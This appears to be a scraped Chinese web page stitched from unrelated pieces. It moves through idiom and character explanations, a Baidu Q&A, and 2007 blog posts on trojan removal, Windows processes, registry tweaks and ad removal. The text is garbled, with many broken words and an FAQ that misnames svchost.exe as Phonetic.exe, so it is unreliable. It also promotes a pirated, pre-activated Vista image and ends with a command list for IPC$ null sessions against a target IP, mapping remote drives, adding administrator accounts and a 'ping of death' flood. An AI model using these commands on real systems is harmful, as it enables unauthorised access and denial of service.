59,世上有三种人:一是良心被狗吃了的人,二是良心没被狗吃的人,三是良心连狗都不吃的人。
60,你可以先知先觉地领导产业,后知后觉地苦苦追赶,或不知不觉地被淘汰。 ( Sun, 28 Mar 2010 18:01:03 +0800 )
Description:
一、释义:
高山:比喻高尚的品德。
高山仰止比喻对高尚的品德的仰慕。
二、出处:
《诗经·小雅·
》:“高山仰止,景行行止。”
三、典故:
“高山仰止,景行行止”出自《诗经·小雅·车辖》。
《史记·
》专门引以赞美孔子:“《诗》有之:‘高山仰止,景行行止。\'虽不能至,然心向往之。”汉郑玄注解说:“古人有高德者则慕仰之,有明行者则而行之。”郑把“高山”比喻崇高的道德,“仰”是慕仰;“景行”是“明行”,即光明正大的行为,是人们行动的准则。宋朱熹则解释说:“仰,瞻望也。景行,大道也。高山则可仰,景行则可行。”朱熹的“高山”,就说是人们平时仰望的高山,没有什么喻义;而“景行”是大道、大路,“景行行止”是说大道可供人们行走。一个崇高得可以,一个直白得可以。对“止”,都解释为语助词,看来没有什么异义。
高
,现在缩略成为成语。高山,比喻道德崇高或高尚;景行,大路,比喻行为光明正大。这话出自《诗经·小雅》。郑玄注解说:“古人有高德者则慕仰之,有明行者则而行之。”朱熹注解说:“仰,瞻望也。景行,大道也。高山则可仰,景行则可行。”一个是汉儒,一个是宋儒,两人说法竟有如此大的差异。 上句“高山仰止”,郑说“高山”比喻崇高的道德,“仰”是慕仰;朱说这是直指人们仰望高山,并无喻义。 下句“景行行止”,分歧更大。依郑说,“景行”解释为“明行”,即光明正大的行为;“则而行之”,是说以此作为行动的准则。依朱说,“景行”(—háng)是大道,“景行行止”是说大道可供人们行走。
郑玄、朱熹都是大儒,两人的说法都有道理,不过由于两人相隔千年之久,在朱说提出之前,郑说已为大家所普遍接受,因此后人在引用这话时,多取郑说,少有取朱说的。现行各种词典,有的两说并存,有的把两说糅合在一起。
两句中的“止”字,是语助词,表示确定语气,后代引用时有改用“之”字的。
“高山仰止,景行行止”,可以缩略为成语“高山景行”,“景仰”一词也由此产生。因为是名句,后代引用的很多,这里只照录见于《史记·孔子世家》的一例:“《诗》有之:‘高山仰止,景行行止。’虽不能至,然心向往之。”
这话是用来赞美孔子的,由于在引文后面加了两句(意思是:虽然不能达到这种程度,可是心里却一直向往着),景仰的意思就格外显豁了。再说,《史记》作者司马迁又比郑玄早生两百多年,可知景仰之说早已通行于世,并非郑玄所首倡也。
另外,“景行行止”这句话中的读音有些分歧,第二个“行”从读音到释义都没有什么问题,分歧在于第一个“行”字,目前所能见到的,主要有三个读音:háng、xíng、xìng。读háng,显然把景行直接解释了大路;读xíng,也显然是把景行直接解释为行为正大光明(把行读作xìng是旧读,如品行、言行、德行、罪行、兽行等,现在都读xíng了)。
( Tue, 2 Mar 2010 17:37:24 +0800 )
Description: 一、赧 nǎn
基本字义:
因羞惭而脸红:~~。~然。~愧。~颜。~然汗下。
详细字义:
〈形〉
1、(形声。从赤,( fú)声。脸红,故从赤。本义:因惭愧而脸红)
2、同本义
大赧而归,填恨低首。——柳宗元《乞巧文》
鬼即赧愧而退。——刘义庆《幽明录》
自为乳儿,长者加以金银华美之服,辄羞赧弃去之。——宋· 司马光《训俭示康》
3、又如:赧颜(羞惭脸红;惭愧);赧愧(羞惭)
4、忧惧
夫子践位则退,自退则敬,否则赧。——《国语·楚语》
5、红
赧郎明月夜,歌曲动寒川。--唐·
》常用词组
常用词组:
(1)
赧红 nǎnhóng 因害羞而脸色发红
(2)
赧然 nǎnrá 形容难为情的样子,羞愧的样子
观其色赧赧然。——《孟子·滕文公下》
赧然一笑
赧然不能启口
二、郝 Hǎo
基本字义:
1、古地名,在今中国陕西省户县和周至县。
2、姓。
详细字义:〈名〉
1、古乡名
郝,右扶风鄠乡盩室县。从邑,赤声。——《说文》。朱曰:“在今陕西西安府。”
2、在今陕西省周至县。
3、姓。
( Sun, 28 Feb 2010 10:54:11 +0800 )
Description: 和字八解 《论语》中说:“礼之用,和为贵;先王之道,斯为美。”意思是说,礼的功用主要是调和,先王之道是以和谐为美。从孔子那个时代起,中华民族就将和赋之以极其深刻和美好的含义。 一解 和就是“尊重” 《中庸》里说:“喜怒哀乐之未发谓之中,发而皆中节谓之和。中也者,天下之大本也;和也者,天下之达道也。致中和,天地位焉,万物育焉。”让人类的喜怒哀乐与周围的环境合拍,既是对生命规律的尊重,也是对自然环境和社会环境的尊重。 二解 和就是“协调” 有人用拆字法分析,“和”是由“禾”字与“口”字组成,意思是“人人都有饭吃”;“谐”字是“言”字和“皆”字组成,意思是“人人都能说话”。 三解 和就是“和平” 和平的反义词是“战争”。有人说“战争”是为了“和平”,但“和平”从来就不喜欢战争。越是经历战争,人们就越渴望和平。 四解 和就是“平等” 无论是国与国之间,还是人与人之间,都需要平等。太阳平等地照耀,地球平等地转动,生命平等地尊贵,法律平等地运行。 五解 和就是“平息” 通过调解、调处、和谈、和约等方式,来平息纠纷、平息矛盾。 六解 和就是“温和” 和风细雨、和颜悦色。你敬我一尺,我就敬你一丈;你让我三分,我就让你十分。 七解 和就是“和睦” 家庭需要和睦,单位需要和睦,邻里需要和睦,民族需要和睦,国家需要和睦,世界需要和睦为什么我打左边shift建打出来是【而打右边的shift建,打出来是;
悬赏分:20
提问时间:2010-7-26 22:13
提问者:
左边的shift打出来就成咯这个【咯
推荐***
你的键盘设定的问题吧,重装系统试试,一般 2键盘会自动认出键盘模式,USB口的键盘可能在键盘型号不同的情况下发出错误信号,你上键盘厂家的官方网站上面再看看,如果是大众化的问题,肯定有官方的解决***
回答时间:2010-7-27 09:49
回答者:
采纳率:32%
擅长领域:
暂未定制
参加的活动:
暂时没有参加的活动
相关内容
2011-3-11
2011-3-10
2011-7-21
2011-4-5
2010-8-24
查看同主题问题:
分享到:
用户名:
记住我的登录状态
2011 Baiduhttp://hi.baidu.com/q eta1 |
| 文章列表 2007-03-31
首个Windows Vista Ultimate OEM Ghost镜像下载(已激活)
制作说明:
1、本镜像用Ghost
11制作,采用Lenovo的Ultimate版本制作。导入了Lenovo的***,镜像大小3.8G。
2、本镜像在C盘制作,采用XP/2003的NT52启动方式,还原到C盘后,可以以后***XP/2003等NT系统,不影响VISTA启动。
3、启动时采用加载虚拟光盘启动,虚拟启动光盘25M左右,可虚拟当前6个版本的OEM
VISTA BIOS,默认是Lenovo启动。本光盘还包括完整的MS-DOS 7.1,PQMAGIC 8.5和GHOST
4、本镜像***了WinRAR 3.7 beta 5,Realplayer 10.5 Plus,InterVedio WinDVD
8.0.104,Office 2007(word,excel,powerpoint,acce ,sharepoint
desiger),迅雷,暴风影音,桌面上放置了“计算机”、“网络”、“Internet
Explorer”、“WinDVD”和OFFICE的快捷方式。
5、本下载是已经做好的光盘镜像ISO,里面包含了做好的GHOST镜像和GHOST 11
软件,且光盘启动后,可以直接运行GHOST命令,光盘启动后盘符为Z。
使用说明:
1、最好把GHOST镜像拷贝到硬盘上再开始GHOST,否则如果你的光盘有问题的话,记录会失败。
2、还原光盘上的VISTAU.GHO到第一个分区,分区大小最好在8.5G以上。
3、还原后,重启计算机。
4、第一次进入桌面后,会有一个对话框,直接点“确定”,然后会重启进入设置模式,设置用户名、计算机名、背景、时区等都完成后,会进入平时使用界
回复后可见更多下载地址。。
我的网盘下载:
| 2007-03-25
将杀毒软件升级到最新也不能查杀,打开浏览器,上网搜索,发现也有朋友中了这种木马,但该网友提供的方法并不能删除木马,无奈之下只好自己“动手”了,以下就是我的整个手工清除木马的过程,写出来与大家分享。 具体的不知道从哪天起,我的Maxthon浏览器好像不能拦截一些网站的广告了,屏幕的右下角也不时的出现如QQ广告一样的东西,一开始以为是网站和QQ的广告。但越用越不对劲,仔细一看,右下角的根本就不是QQ的广告,出来的整个广告就是一个链接,不像QQ广告外面还有一个框,鼠标放在上面是不会变成手形的,而这个广告,无论鼠标放在什么地方都是手形的。我开始怀疑我中招了,将杀毒软件升级到最新也不能查杀,打开浏览器,上网搜索,发现也有朋友中了这种木马,但该网友提供的方法并不能删除木马,无奈之下只好自己“动手”了,以下就是我的整个手工清除木马的过程,写出来与大家分享。
1、常规操作
打开任务管理器,查看进程,并没有发现什么不良进程。
2、深入挖掘
运行Regedit,依次展开
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
一看,果然多了个新家伙Advapi32,一看键值,竟然加载的是一个Dll文件,而这个文件位于C:\WINDOWS\Downloaded Program Files目录下的_IS_0518目录中。找到了根源就好办了,先删除了启动项,再删除对应的木马文件就行了,但到了C:\WINDOWS\Downloaded Program Files目录一看,发现这些文件根本看不到(开启了显示隐藏文件项)。且重启之后启动项又出现了,很显然,这个木马监视注册表,且文件隐藏。为了剿灭彻底,以下步骤是进入安全模式后进行的(开机时按住F8键或Ctrl键不放直到启动菜单出现)。 在第三步之前,我曾尝试直接用第四步的方法删除木马文件,但发现重启之后木马并没有消失,因此初步判断该木马存在备份文件。
3、清除木马备份文件
打开“我的电脑”进入C:\Windows目录,发现一个可疑目录Backup,进去一看,果然启动项加载的Dll文件也在里面,但启动项加载的却不是这个目录中的文件,很显然这个目录就是木马的备份,先删除这个备份目录再说,但刚刚删除,大概一两秒的时间这个目录又被重新建立。这个木马还真狡猾,竟然在安全模式还能自动加载且监视备份文件,一旦备份文件被删除,马上又会建立。正所谓“以彼之道还施彼身”,它能监视且能自动建立备份目录,我如果能先将目录删除,然后抢在它的前面建立目录不就行了吗?因为Windows是不允许同一目录下有两个文件或目录同名的。但从备份目录被删除到被重新建立中间的间隔太短了,手工肯定是不行的,那么就用Dos时代的批处理吧!先建立如下的批处理文件,命名为Kill.bat,双斜杠之后是注释,实际操作时无需输入。Move c:\windows\backup c:\windows\bak //将Backup目录重命名为BakMd c:\windows\backup //在C:\windows下建立Backup目录这时再打开“我的电脑”,依次进入C:\windows目录,将Bak目录删除,即完成了木马备份文件的删除。
4、清除木马文件
重新建立一个批处理文件,命名为Kill2.bat,内容如下。cd c:\ //将当前路径改为C:盘的根目录cd C:\WINDOWS\Downloaded Program Files //将当前路径改为C:\WINDOWS\Downloaded Program Filesmove _IS_0518 c:\bak//将当前目录下的_IS_0518目录移动到C:根目录下并重命名为bak打开“我的电脑”,进入C:\,删除Bak目录,再进入C:\windows目录,删除Backup目录,即完成了木马文件的清除。
5、清理注册表
运行Regedit,分别将下面所列的键删除。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Advapi32HKEY_CURRENT_USER/Software/advapi32
至此,Advapi32木马(因为在网上也没查到此木马的名字,所以就用它的自启动项键名来代替了)手工清理完毕。注: 1.第三步和第四步顺序千万不能对调,因为只有先删除备份文件,再删除木马文件,这时因为木马文件没有了,备份文件也没有了,所以木马也就没办法重新建立文件了。 2.以前也在报刊上看到过手工清除木马的例子,但大部分都是一些利用进程查看工具结束进程来实现的,由于此木马进程伪装隐蔽,笔者曾用IceSword查看,虽能初步判断木马隐藏在Svchost.exe进程中,但由于Windows XP中Svchost.exe进程比较多,所以不好判断其具体的隐藏位置,结束进程的方法也就不好实现了,反而用本文所提的方法就能轻松将木马剿灭。 3.本方法在Windows XP Pro + SP2下测试通过。
| 2007-03-25
对于进程这个概念,许多电脑用户都没有给予太多关注。在很多人印象里,只知道结束进程可以杀死程序,至于哪些进程对应哪些程序,究竟什么样的进程该杀,什么样的进程不能杀这些问题很少考虑。这里通过几个实例为大家揭开进程的神秘面纱。
实例一:和进程的“表演者”交个朋友
很多时候,我们并没有注意到系统中到底有多少进程。如果想了解进程的秘密,首先就必须和一些常见系统进程交个朋友,一旦掌握了它们,就能像侦探一样迅速从进程名单中发现可疑的家伙。
在Windows 2000/XP中,Ctrl+Shift+Esc组合键能快速调出任务管理器,而Windows 9X为Ctrl+Alt+Del组合键。
1.“主角”进程
首先来熟悉一下系统中的基本进程,它们是系统运行的基本条件,一般情况下不能关闭它们,否则会导致系统崩溃。
Windows 2000/XP:sm .exe、csr .exe、winlogon.exe、services.exe、lsa .exe、svchost.exe(可以同时存在多个)、 oolsv.exe、explorer.exe、System Idle Proce ;
Windows 9x:msgsrv32.exe、mprexe.exe、mmtask.tsk、kenrel32.dll。
你知道吗
进程与程序
简单地说,每启动一个程序,就启动了一个进程。在Windows 3.x中,进程是最小运行单位。在Windows 9X/2000/XP中,每个进程还可以启动几个线程,比如每下载一个文件可以单独开一个线程。在Windows 9X/2000/XP中,线程是最小单位。程序是永存的,进程是暂时的。举一个例子说:如果程序是剧本,那么表演过程就是进程;如果程序是菜谱,那么烹调过程就是进程。
人鬼情未了——Svchost.exe
它位于系统目录的System32文件夹,是从动态链接库(DLL)运行服务的一般性宿主进程。在任务管理器中,可能会看到多个Svchost.exe在运行,不要大惊小怪,这可能是多个DLL文件在调用它。不过,正因为如此,它也成为了病毒利用的对象,以前的“蓝色代码”病毒就是一例。另外,如果感染了冲击波病毒,系统也会提示“Svchost.exe出现错误”。
如果要查看哪些服务正在使用Svchost.exe,对于Windows 2000可从其***光盘的Su ortToolsSu ort.cab压缩包中,将Tlist.exe解压缩至任意目录,接着在“命令提示符”中进入Tlist.exe所在目录,输入“tlist -s”并回车(“tlist pid”命令可看到详细信息)。而在Windows XP则直接输入“Tasklist /SVC”查看进程信息(“Tasklist /fi "PID eq proce ID"”则可看到详细信息)。
2.“配角”进程
这些系统进程虽然不是系统运行必须的,但也经常在进程列表中抛头露面。如internat.exe、systray.exe、rundll32.exe、loadwc.exe、ddhelp.exe、mstask.exe、ctfmon.exe、taskmagr.exe、m msgr.exe、wmiexe.exe,它们都是正常的系统进程。
建议在***完Windows后,点击“开始→程序→附件→系统工具→系统信息”,在打开的“系统信息”窗口中再点击“软件环境→正在运行任务”(在此进程列表中,可看到更详细的属性,其中程序路径是非常重要的信息),接着点击“操作→另存成文本文件”,以后系统出现异常时则对照进行分析。另外,“优化大师”也提供了保存进程快照的功能●。
实例二:查找木马的蛛丝马迹
许多木马和一些防护工具采用了双进程保护手段,例如“Falling Star”木马就采用双进程模式,下面来看看如何发现它们。
第一步:打开任务管理器。根据和常见进程比较,很明显会发现两个“熟悉的陌生人”(和系统基本进程名称相似,但不相同):“internet.exe”和“systemtray.exe”。请和上一实例中的”配角“进程比较。
第二步:打开“系统信息”的“软件环境→正在运行任务”,查看路径信息,两者均指向WindowsSystem32目录,而且文件大小、日期均相同,但从文件日期来看并不属于微软的系统文件。进入资源管理器查看其版本属性,虽然公司标明为Microsoft,但与系统文件中的微软公司名称书写并不相同,基本可断定是非法进程,并且为双进程模式。
第三步:在尝试结束进程时,第一次选择“systemtray.exe”来结束进程树,结果进程马上就再生了,任务管理器中又显示出这两个进程!于是再次选择“internet.exe”,然后结束进程树●。进程没有再生,从而将木马进程从系统中清除。
实例三:真真假假系统进程
许多病毒和木马为避免从进程名称中发现它们的踪影,往往会采用“障眼法”,使用和系统文件或系统进程名称类似的进程名称。
1.文件名伪装
(1)修改常见程序或进程个别字符
例如,上面介绍的“Falling Star”木马的进程名称“internet.exe”就与输入法进程“internat.exe”十分相似。“WAY无赖小子”的服务端进程名称为“msgsvc.exe”,与系统基本进程“msgsrv32.exe”类似,还有Explorer.exe和Exp1orer.exe的区别,不仔细的话你能看出来吗?(数字“1”取代了字母“l”)
(2)修改扩展名
著名的冰河木马的服务端进程为Kernel32.exe,乍一看很熟悉,好像是哪个系统进程,其实系统根本不存在这样一个文件,Windows 9x的基本进程中却有一个叫做“Kernel32.dll”的。诸如此类的还有“Shell32.exe”的木马进程是从“Shell32.dll”这个大家都很熟悉的文件“演变”而来的,实际在系统中都是不存在的。
2.路径伪装
Windows目录和System目录是系统核心文件所在地,一般是“闲人免进”。因此,出入它们的文件一般都被人们认为是系统文件,而病毒和木马就借机将源文件放在这两个目录中。对于这类情况,一般只需要通过系统信息找到其源文件路径,打开文件的属性,从日期(这个非常重要,可以看是否与系统文件日期一样)、版本、公司名称信息中即可看出破绽。没有哪个病毒、木马文件能设计得与系统文件完全一致。
实例四:优化系统从进程开始
除系统运行必须的基本进程外,每个程序运行后都会在系统中生成进程,每个进程都会占用一定的CPU资源和内存资源。过多的进程和一些设计不良的进程就会导致系统变慢、性能下降,这时可对它们进行一下优化。
此主题相关图片如下:
按此查看图片详细信息正在读取此图片的详细信息,请稍候 ...
1.精简进程
系统中的一些进程并不是必须的,结束它们并不会对系统造成什么损害。
比如:internat.exe(显示输入法图标)、systray.exe(显示系统托盘小喇叭图标)、ctfmon.exe(微软Office输入法)、mstask.exe(计划任务)、sysexplr.exe(超级解霸伺服器)、winampa.exe(Winamp代理)、wzqkpick.exe(WinZip助手)等。
有一款叫做“进程杀手”的免费小工具,具备自动精简进程功能,可自动中止系统基本进程以外的所有进程。在怀疑电脑运行了某些黑客进程或病毒进程但又不能确定是哪一个时,该软件就可以有效清除那些非法进程。不过它只适合Windows 9x/Me。下载地址
2.杀死不良进程
有时你会发现系统运行速度特别慢,这时可打开任务管理器,单击“进程”标签,点击“CPU”列标签让进程按CPU资源占用排序,可以很明显地看到资源占用最高的程序。同样方法,可以点击“内存”列标签,查看那些内存占用大户,及时结束进程。
这里有一种情况比较特殊:在查看CPU占用率时,一个叫做“System Idle Proce ”的进程会一直显示在90%左右。不必担心,实际上它并没有占用这么多系统资源,单击“性能”标签可看到其实际的CPU资源占用情况。
★对于Windows 9x,使用任务管理器是无法像Windows 2000/XP那样看到所有进程以及CPU、内存占用情况,推荐使用Proce Explorer(下载地址
★如果某个16位程序影响了系统运行,而且死活也关不掉,可进入任务管理器的进程选项卡,找到NTVDM.exe进程,将其关掉即可杀掉所有16位应用程序,而不用重启。
此主题相关图片如下:
按此查看图片详细信息正在读取此图片的详细信息,请稍候 ...
3.优化软件或游戏性能
你还可以通过改变软件和游戏进程优先级来提高其性能,这样能使它们运行得更快,当然负作用就是可能影响到其他正在运行的进程。比如,为避免刻录缓存溢出问题造成刻录失败,可进入任务管理器的进程选项卡,找到并右击刻录软件的进程项,选择“设置优先级”,然后在弹出的子菜单中选择“高”。如果你不想每次都这样设置,可使用下面的方法。
第一步:打开软件或游戏所在目录,比如:D:/game,在这里新建一个文本文件,在其中输入以下语句:
echo off
start /priority game.exe
说明:将priority替换为所需的CPU优先级,建议使用high(高)、abovenormal(高于标准),因为它们的效果最好。将game.exe替换为软件或游戏的可执行文件名称,比如:stvoy.exe。
第二步:做完以上修改后将其保存为game.bat,现在就能通过这个文件来启动游戏或软件,而它将会使游戏或软件具有更高的CPU优先级。不过要注意的是,该文件必须要保存在游戏或软件所在目录。
| 2007-03-25
利用优先级
问:进程中有一个“设置优先级”,我查看了一下,发现都是“标准”,那么是不是需要对那些进程手工调整一下呢?
答:优先级是系统自动来调整的,一般无需我们自己调整。不过遇到特殊情况,调整一下对电脑使用有好处。比如你想一边看电影一边打文字或干别的什么话,那么就调整那个电影播放器的进程,设置为“低于标准”,系统提示“可能会导致系统不稳定”,不要管它,选“是”继续。这样前台程序就会比后台程序(播放软件)优先,系统会让前台程序优先执行,前台程序空闲的时候再让后台程序满负荷工作。这样就可以充分占用前台程序剩下的系统资源,达到对系统资源的高效利用。
System Idle Proce 为何物
问:在使用Windows XP的过程中,按“Ctrl+Alt+Del”键调出任务管理器,在进程中我发现一个名为“System Idle Proce ”的进程,它往往占用了大部分CPU资源,经常是80%以上,请问为什么它占用了那么多资源?
答:你误解了“System Idle Proce ”进程的意思了,这里的80%并不是你所想的占用CPU的资源,恰恰相反的是这里的80%以上是CPU资源空闲了出来的。这里的数字越大表示CPU可用资源越多,数字越小则表示CPU资源越紧张。该进程是系统必须的,不能禁止哦。
Phonetic.exe进程为何如此多
问:我使用的是Windows XP系统,最近在查看系统进程时发现进程中“Phonetic.exe”很多,大概有四个左右,请问它们是做什么的?是不是病毒啊?
答:Phonetic.exe文件对那些从动态连接库中运行的服务来说是一般性的宿主进程。电脑在启动的时候,Phonetic.exe检查注册表中的位置来构建需要加载的服务列表,加上运行软件时启动的DLL文件需要依附到Phonetic.exe进程上,这就会使多个Phonetic.exe在同一时间运行。不过,很多病毒也会利用这个进程,如前段时间的冲击波病毒,中招了就会提示“Phonetic.exe出现错误”。
哪些进程可以删除
问:我总是感觉系统进程中的进程太多了,这其中应该有不少是无用的吧?请问哪些我们可以禁止掉呢?
答:对于我们个人用户来说,系统中的进程的确有一些是用不到的。比如:systray.exe(显示系统托盘小喇叭图标)、ctfmon.exe(微软Office输入法)、mstask.exe(计划任务)、winampa.exe等,这些都是可有可无的进程,我们完全可以禁止它们,而不会影响到系统的正常运行。推荐“进程杀手”这款小软件,它具有自动精简进程功能,可自动中止系统基本进程以外的所有进程的功能,另外对木马和病毒进程也有一定清除作用。
同时运行许多Phonetic进程
| 2007-03-25
HKEY_CLASSES_ROOT中全面设定文件关联
HKEY_CLASSES_ROOT是注册表中的一项RootKey。
其记录了多种类的信息。这里我们只说说基本的文件关联类。
展开该根项,应该看到很多很多子项。
最前面通常是*,这个子项比较关键。他代表所有的文件类型。
其后是一些类似于“.asf”,“.txt”这些项目代表了该扩展名对应的文件信息。
默认键值记录该扩展名文件属于哪一个类的文件类型。
比如.log和.txt都是属于txtfile类的文件类型。
修改HKEY_CLASSES_ROOT\txtfile下的东西就可以同时修改.log文件和.txt文件的相关参数。
展开后得到的子项中比较比较常见的有:
OpenWithList 这个目前还不是特别清楚,貌似是打开程序的列表。但是似乎不怎么管用。
Shell 这个就是打开该文件类型的操作
ShellEx 这个是打开该文件类型的外壳操作扩展
我们能改变的基本上只有Shell子项。
ShellEx子项因为是用Cla ID来表示的,他们是***某些特定的程序后注册的,因此,很难增加或修改。但是可以比
较容易地删除。
比如,我们知道avi文件在资源管理器里是可以进行预览的,但是当我们进入一个包含较多***I文件的文件夹,速度会
变得比较慢。
流行的解决方法是Regsvr32 / u 掉某个DLL。(记不清楚了)
我们用ShellEx来解决。
HKEY_CLASSES_ROOT\.avi\ShellEx\{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1}
把默认键由:
{c5a40261-cd64-4ccf-84cb-c394da41d590}
!{c5a40261-cd64-4ccf-84cb-c394da41d590}
即在前面加一个感叹号(别的符号也可以)。当我们需要的时候,删掉这个感叹号就可以了。
其他的操作可以近似地模仿。对于ShellEx内有比较多的Cla ID的时候,可以一个一个地尝试。
(对于一些系统文件的关联,还需要在HKEY_CLASSES_ROOT\SystemFileA ociatio \下删除一次)
(比如感叹号掉:HKEY_CLASSES_ROOT\SystemFileA ociatio \.avi\shellex\PropertyHandler可以去掉鼠标悬停的
提示和属性页面的摘要内容)
下面我们以Bat批处理文件为例说一说Shell操作的修改。
展开HKEY_CLASSES_ROOT\.bat
看到默认的键值是Batfile,说明.bat扩展名文件属于batfile类的文件类型
于是,我们展开HKEY_CLASSES_ROOT\batfile
看到默认键值,是个中文的,放心的修改。这个就是文件类型的说明。
比如修改成:“MS-DOS批处理文件”
在这个位置其他的可选键有:
NoOpen 字符串 表示没有默认操作时显示警告框。可以参看HKEY_CLASSES_ROOT\ocxfile\NoOpen
InfoTip 字符串 表示鼠标悬停的有关该文件的信息提示。
TileInfo 字符串 表示平铺视图下图标旁边的信息提示。
(比如我把它改为prop:Size;Create 则会显示Bat文件的大小和创建时间)
以下是子项:
DefaultIcon 这个表示了该类型的文件采用的默认图标。 通常这个值是:%SystemRoot%\System32\shell32.dll,-153 他表示使用系统更目录下\System32\shell32.dll的第153个图标。 DLL文件中可以以资源的方式包含若干图标。大家可以自定义一个文件夹,选择改变图标,然后选定某个DLL,就
可以看到它包含的所有图标了。(也可能一个都没有)看到的编号在这里从第一列开始向下,然后第二列。。。比如第
二列第二个编号就是5。 或者用一些工具,比如MicroAngelo,可以搜索所有DLL和EXE等包含图标资源的文件。
Shell 这个子项是我们的关键 展开Shell可以看到几个子项,每一个子项代表了一个Shell操作。 比如Open,代表打开,Edit代表编辑 Shell下的默认键值可以设定双击该类型文件执行的Shell操作。比如设定为Open。那么双击Bat文件就意味着执行
批处理。 然后我们展开其中一个子项。比如Open 默认键值是该操作的显示名称。我们改为:“执行批处理(&am O)” &am O表示出现一个带下划线的O并设定为快捷键。 Open下含有一个叫Command的子项,其默认键值记录执行的操作。对于Bat文件来说。应该是: "%1" %* 一些病毒木马会修改这个地方。(类似的有EXE,COM文件类型)大家就不要改了。 同样的修改Edit子项为“编辑批处理(&am E)”
这样我们的Bat文件类型就修改得差不多了。
相关应用举例: 我想很多人都被U盘病毒所厌恶。刚开始很多人说用右键,选择“打开”就可以安全进入U盘。 其实是不正确的,一些U盘病毒可以在Autorun.inf中写入信息,去掉Open外壳操作,而替换成自己的Open操作。
因此,我们展开: HKEY_CLASSES_ROOT\Folder\shell\open 把默认键值修改成:打开文件夹(&am O) 这样,当我们在文件夹和驱动器上点击右键的时候,如果看到的是“打开”操作,那么就是有问题的。 如果看到的是“打开文件夹”操作,则可以放心地点击。因为不会有病毒那么笨,修改这么特殊的外壳操作名字
。 很多朋友都希望能够在文件夹图标上右键,选择从MS-DOS进入。 有很多优化软件提供这个功能,但是名字通常都是叫“DOS 在这里”,名字很不好。 我们可以DIY一个。展开: HKEY_CLASSES_ROOT\Directory\shell\ 新建MSDOS子项,输入默认键值为:“用命令行打开(&am L)” 然后在MSDOS下新建Command子项,输入默认键值为:“cmd.exe /k "cd %L"” 类似的我们可以DIY一个DLL文件的注册和卸载外壳操作。 留给大家自己解决~~~
本帖最后由 Microsoft 于 2007-2-4 22:32 编辑
(2007-2-4 22:32, 45.87 K)
| 2007-03-25
前几天发了个迅雷去广告方法,朋友们反映原广告处成了白板,今天再发一个不会白板的去广告法,你如果讨厌边上的"热门推荐"也可以把它去了!这样网速也会快很多,希望朋友们喜欢!!
注意:所有修改均在关闭迅雷时执行!
一、去广告条
1、打开迅雷5的***目录(我的是D:\程序\Thunder Network\Thunder\Program);
(2007-3-10 15:50, 78.25 K)
2、找到gui.cfg文件,然后用记事本打开;
(2007-3-10 15:50, 73.62 K)
3、把它的内容改为:
[URL] ADServer=D:\程序\Thunder Network\Thunder\Program\Ad\main
LastModifyTime=Sat, 17 Feb 2007 23:53:07 GMT NavigateTimes=10 TimeSpan=300 PartnerNavigateTimers=10 PartnerTimeSpan=300 PVServer=aD:\程序\Thunder Network\Thunder\Program\Ad\main PVPort=3076 PVTimeSpan=5 ADCountingServer=D:\程序\Thunder Network\Thunder\Program\Ad\main ADCountingPort=3076 HomePage=D:\程序\Thunder Network\Thunder\Program\Ad\new [A Settings] BlogCollectTime=29840686 BlogCollectTimeL=-579712352 BlogFileDate=Wed, 07 Feb 2007 12:27:22 GMT
4、修改完后保存,然后重新启动迅雷。
[注意]***目录一定要改成你自己实际的目录.
二、 去热门推荐
1、打开迅雷5的***目录(我的是D:\程序\Thunder Network\Thunder\Profiles);
2、找到UserConfig.ini文件,然后打开;
(2007-3-10 15:50, 66.49 K)
3、找到[Splitter_1]项下面的Pane1_Hide,将其值改为1(原始值为0);
(2007-3-10 15:50, 32.29 K)
4、修改完后保存,然后重新启动迅雷。 呵呵,是不是清爽许多啊。而且启动速度也快了
(2007-3-10 15:50, 95.8 K)
怎么样,好看了吧?好用顶一下,有问题在回复里问吧.
| 2007-03-25
CMD命令大全(已更新)
net use [url=file://ip/ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
net use [url=file://ip/ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
net use h: [url=file://ip/c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: [url=file://ip/c$]\\ip\c$[/url] 登陆后映射对方C:到本地为H:
net use [url=file://ip/ipc$]\\ip\ipc$[/url] /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:***istrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view [url=file://ip/]\\ip[/url] 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net pa word 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况 tstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有***的,在***目录的Su ort/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有***的,在***目录的Su ort/tools文件夹内)
